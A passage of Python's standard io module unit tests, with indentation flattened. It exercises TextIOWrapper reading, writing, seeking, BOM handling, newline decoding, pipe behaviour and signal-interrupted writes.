def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(support.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(support.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(support.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check that the BOM is written only once (see issue #1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(OSError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# Read in amounts equal to TextIOWrapper._CHUNK_SIZE, which is 128.
def test_read_by_chunk(self):
# Make sure "\r\n" straddles the 128-character chunk boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO())
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_seek_append_bom(self):
# Same test, but first seek to the start and then to the end
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
with self.open(filename, 'a', encoding=charset) as f:
f.seek(0)
f.seek(0, self.SEEK_END)
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, "w") as f:
self.assertEqual(f.errors, "strict")
with self.open(support.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@support.no_tracing
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(support.TESTFN, "w", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=run, args=(x,))
for x in range(20)]
with support.start_threads(threads, event.set):
time.sleep(0.02)
with self.open(support.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
# Test that text file is closed despite failed flush
# and that flush() is called before file closed.
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
closed = []
def bad_flush():
closed[:] = [txt.closed, txt.buffer.closed]
raise OSError()
txt.flush = bad_flush
self.assertRaises(OSError, txt.close) # exception not swallowed
self.assertTrue(txt.closed)
self.assertTrue(txt.buffer.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
txt.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
txt.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(txt.closed)
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
txt.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(txt.closed)
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_unseekable(self):
txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata))
self.assertRaises(self.UnsupportedOperation, txt.tell)
self.assertRaises(self.UnsupportedOperation, txt.seek, 0)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises(AttributeError):
txt.buffer = buf
def test_rawio(self):
# Issue #12591: TextIOWrapper must work with raw I/O objects, so
# that subprocess.Popen() can have the required unbuffered
# semantics with universal_newlines=True.
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
# Reads
self.assertEqual(txt.read(4), 'abcd')
self.assertEqual(txt.readline(), 'efghi\n')
self.assertEqual(list(txt), ['jkl\n', 'opq\n'])
def test_rawio_write_through(self):
# Issue #12591: with write_through=True, writes don't need a flush
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n',
write_through=True)
txt.write('1')
txt.write('23\n4')
txt.write('5')
self.assertEqual(b''.join(raw._write_stack), b'123\n45')
def test_bufio_write_through(self):
# Issue #21396: write_through=True doesn't force a flush()
# on the underlying binary buffered object.
flush_called, write_called = [], []
class BufferedWriter(self.BufferedWriter):
def flush(self, *args, **kwargs):
flush_called.append(True)
return super().flush(*args, **kwargs)
def write(self, *args, **kwargs):
write_called.append(True)
return super().write(*args, **kwargs)
rawio = self.BytesIO()
data = b"a"
bufio = BufferedWriter(rawio, len(data)*2)
textio = self.TextIOWrapper(bufio, encoding='ascii',
write_through=True)
# write to the buffered io but don't overflow the buffer
text = data.decode('ascii')
textio.write(text)
# buffer.flush is not called with write_through=True
self.assertFalse(flush_called)
# buffer.write *is* called with write_through=True
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), b"") # no flush
write_called = [] # reset
textio.write(text * 10) # total content is larger than bufio buffer
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), data * 11) # all flushed
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read, 1)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.readline)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read)
def test_illegal_decoder(self):
# Issue #17106
# Bypass the early encoding check added in issue 20404
def _make_illegal_wrapper():
quopri = codecs.lookup("quopri")
quopri._is_text_encoding = True
try:
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'),
newline='\n', encoding="quopri")
finally:
quopri._is_text_encoding = False
return t
# Crash when decoder returns non-string
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read, 1)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.readline)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read)
def _check_create_at_shutdown(self, **kwargs):
# Issue #20037: creating a TextIOWrapper at shutdown
# shouldn't crash the interpreter.
iomod = self.io.__name__
code = """if 1:
import codecs
import {iomod} as io
# Avoid looking up codecs at shutdown
codecs.lookup('utf-8')
class C:
def __init__(self):
self.buf = io.BytesIO()
def __del__(self):
io.TextIOWrapper(self.buf, **{kwargs})
print("ok")
c = C()
""".format(iomod=iomod, kwargs=kwargs)
return assert_python_ok("-c", code)
@support.requires_type_collecting
def test_create_at_shutdown_without_encoding(self):
rc, out, err = self._check_create_at_shutdown()
if err:
# Can error out with a RuntimeError if the module state
# isn't found.
self.assertIn(self.shutdown_error, err.decode())
else:
self.assertEqual("ok", out.decode().strip())
@support.requires_type_collecting
def test_create_at_shutdown_with_encoding(self):
rc, out, err = self._check_create_at_shutdown(encoding='utf-8',
errors='strict')
self.assertFalse(err)
self.assertEqual("ok", out.decode().strip())
def test_read_byteslike(self):
r = MemviewBytesIO(b'Just some random string\n')
t = self.TextIOWrapper(r, 'utf-8')
# TextIOWrapper will not read the full string, because
# we truncate it to a multiple of the native int size
# so that we can construct a more complex memoryview.
bytes_val = _to_memoryview(r.getvalue()).tobytes()
self.assertEqual(t.read(200), bytes_val.decode('utf-8'))
def test_issue22849(self):
class F(object):
def readable(self): return True
def writable(self): return True
def seekable(self): return True
for i in range(10):
try:
self.TextIOWrapper(F(), encoding='utf-8')
except Exception:
pass
F.tell = lambda x: 0
t = self.TextIOWrapper(F(), encoding='utf-8')
class MemviewBytesIO(io.BytesIO):
'''A BytesIO object whose read method returns memoryviews
rather than bytes'''
def read1(self, len_):
return _to_memoryview(super().read1(len_))
def read(self, len_):
return _to_memoryview(super().read(len_))
def _to_memoryview(buf):
'''Convert bytes-object *buf* to a non-trivial memoryview'''
arr = array.array('i')
idx = len(buf) - len(buf) % arr.itemsize
arr.frombytes(buf[:idx])
return memoryview(arr)
class CTextIOWrapperTest(TextIOWrapperTest):
io = io
shutdown_error = "RuntimeError: could not find io module state"
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read)
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
with support.check_warnings(('', ResourceWarning)):
rawio = io.FileIO(support.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
class PyTextIOWrapperTest(TextIOWrapperTest):
io = pyio
shutdown_error = "LookupError: unknown encoding: ascii"
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(bytes([b])))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertIsNotNone(obj, name)
if name == "open":
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(support.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
with support.check_warnings(('', DeprecationWarning)):
f = self.open(support.TESTFN, "U")
self.assertEqual(f.name, support.TESTFN)
self.assertEqual(f.buffer.name, support.TESTFN)
self.assertEqual(f.buffer.raw.name, support.TESTFN)
self.assertEqual(f.mode, "U")
self.assertEqual(f.buffer.mode, "rb")
self.assertEqual(f.buffer.raw.mode, "rb")
f.close()
f = self.open(support.TESTFN, "w+")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
f = self.open(support.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
self.assertRaises(ValueError, f.read1)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
if hasattr(f, "readinto1"):
self.assertRaises(ValueError, f.readinto1, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.readlines, 1)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
# Various BlockingIOError issues
class C(str):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "w") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
def _check_warn_on_dealloc(self, *args, **kwargs):
f = open(*args, **kwargs)
r = repr(f)
with self.assertWarns(ResourceWarning) as cm:
f = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_warn_on_dealloc(self):
self._check_warn_on_dealloc(support.TESTFN, "wb", buffering=0)
self._check_warn_on_dealloc(support.TESTFN, "wb")
self._check_warn_on_dealloc(support.TESTFN, "w")
def _check_warn_on_dealloc_fd(self, *args, **kwargs):
fds = []
def cleanup_fds():
for fd in fds:
try:
os.close(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
self.addCleanup(cleanup_fds)
r, w = os.pipe()
fds += r, w
self._check_warn_on_dealloc(r, *args, **kwargs)
# When using closefd=False, there's no warning
r, w = os.pipe()
fds += r, w
with support.check_no_resource_warning(self):
open(r, *args, closefd=False, **kwargs)
def test_warn_on_dealloc_fd(self):
self._check_warn_on_dealloc_fd("rb", buffering=0)
self._check_warn_on_dealloc_fd("rb")
self._check_warn_on_dealloc_fd("r")
def test_pickling(self):
# Pickling file objects is forbidden
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+b", "buffering": 0},
]:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
with self.open(support.TESTFN, **kwargs) as f:
self.assertRaises(TypeError, pickle.dumps, f, protocol)
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
@unittest.skipUnless(hasattr(os, 'set_blocking'),
'os.set_blocking() required for this test')
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
os.set_blocking(r, False)
os.set_blocking(w, False)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
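# Keep only the prefix of the last message that was actually written
# before the pipe filled up and the write raised BlockingIOError.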
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
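# Drain whatever is left in the pipe: in non-blocking mode read()
# returns None once no data is available, which stops the iterator.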
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertEqual(sent, received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
def test_create_fail(self):
# 'x' mode fails if the file already exists
with self.open(support.TESTFN, 'w'):
pass
self.assertRaises(FileExistsError, self.open, support.TESTFN, 'x')
def test_create_writes(self):
# 'x' mode opens for writing
with self.open(support.TESTFN, 'xb') as f:
f.write(b"spam")
with self.open(support.TESTFN, 'rb') as f:
self.assertEqual(b"spam", f.read())
def test_open_allargs(self):
# there used to be a buffer overflow in the parser for rawmode
self.assertRaises(ValueError, self.open, support.TESTFN, 'rwax+')
class CMiscIOTest(MiscIOTest):
io = io
def test_readinto_buffer_overflow(self):
# Issue #18025
class BadReader(self.io.BufferedIOBase):
def read(self, n=-1):
return b'x' * 10**6
bufio = BadReader()
b = bytearray(2)
self.assertRaises(ValueError, bufio.readinto, b)
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_daemon_threads_shutdown_deadlock(self, stream_name):
# Issue #23309: deadlocks at shutdown should be avoided when a
# daemon thread and the main thread both write to a file.
code = """if 1:
import sys
import time
import threading
from test.support import SuppressCrashReport
file = sys.{stream_name}
def run():
while True:
file.write('.')
file.flush()
crash = SuppressCrashReport()
crash.__enter__()
# don't call __exit__(): the crash occurs at Python shutdown
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
time.sleep(0.5)
file.write('!')
file.flush()
""".format_map(locals())
res, _ = run_python_until_end("-c", code)
err = res.err.decode()
if res.rc != 0:
# Failure: should be a fatal error
self.assertIn("Fatal Python error: could not acquire lock "
"for <_io.BufferedWriter name='<{stream_name}>'> "
"at interpreter shutdown, possibly due to "
"daemon threads".format_map(locals()),
err)
else:
self.assertFalse(err.strip('.!'))
def test_daemon_threads_shutdown_stdout_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stdout')
def test_daemon_threads_shutdown_stderr_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stderr')
class PyMiscIOTest(MiscIOTest):
io = pyio
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1/0
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
read_results = []
def _read():
if hasattr(signal, 'pthread_sigmask'):
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM])
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
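# Build a payload larger than the pipe capacity so the write is
# guaranteed to block part-way through.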
large_data = item * (support.PIPE_MAX_SIZE // len(item) + 1)
try:
wio = self.io.open(w, **fdopen_kwargs)
t.start()
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
signal.alarm(1)
try:
self.assertRaises(ZeroDivisionError, wio.write, large_data)
finally:
signal.alarm(0)
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
# Issue #22331: The test hangs on FreeBSD 7.2
@support.requires_freebsd_version(8)
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
@support.no_tracing
def check_reentrant_write(self, data, **fdopen_kwargs):
